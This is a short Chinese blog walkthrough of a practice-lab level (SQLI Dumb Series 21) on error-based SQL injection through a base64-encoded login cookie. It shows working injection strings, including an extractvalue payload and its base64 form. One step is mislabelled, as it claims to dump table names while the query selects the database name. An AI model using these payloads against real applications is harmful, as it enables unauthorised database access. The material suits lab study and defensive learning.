Cookie Injection- Error Based- complex - string ( 基于错误的复杂的字符型Cookie注入)

(1)登录成功后有以下页面:

SQLI DUMB SERIES-21 随笔 第1张

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

其中红圈内的字符为admin的BASED64编码后的字符。

(2)用burp抓包,再刷新浏览器。

寻找闭合方式:明文:admin' --+ based64编码:YWRtaW4nICAtLSs=

SQLI DUMB SERIES-21 随笔 第2张

闭合方式为' )

(3)开始报错注入,需要将payload用based63编码输入。例如:爆表名

admin') and extractvalue(1,concat(0x7e,(select database())))and ('

 编码:

YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSkpYW5kICgn

 SQLI DUMB SERIES-21 随笔 第3张

SQLI DUMB SERIES-21 随笔 第4张

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄